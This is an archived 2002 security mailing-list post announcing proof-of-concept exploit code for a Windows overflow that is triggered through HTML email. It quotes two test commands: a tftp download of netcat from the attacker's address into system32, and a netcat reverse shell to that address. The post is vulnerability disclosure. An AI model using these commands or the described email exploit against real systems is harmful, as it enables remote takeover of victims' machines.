From: Gary O'leary-Steele (garyo@sec-1.com)
Date: Mon Aug 12 2002 - 11:22:10 EDT
Hello all,
For some reason my previous posts did not make it onto SecurityFocus ?-)
The following is a link to proof-of-concept / exploit code for this
overflow. The shell code is relatively small but effective if used
correctly. The Perl script takes a command to execute (WinExec, SW_HIDE) and
an HTML output file. There are two versions included in the zip.
HelpMe.pl  // was written to work with my machine's Kernel32.dll version 5.0.2195.4272 (Rare ?)
HelpMe2.pl // was written to work with all other machines I tested, kernel32.dll version 5.0.2195.2778
I have tested the exploit using two HTML emails.
email 1 executes: tftp.exe -i my.ip.address get nc.exe c:\winnt\system32\nc.exe
email 2 executes: nc.exe my.ip.address 80 -e cmd.exe
If the exploit executes correctly, ExitProcess() is called so no error occurs.
Kind regards,
Gary O'leary-Steele
XScan Team
www.Sec-1.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:24 EDT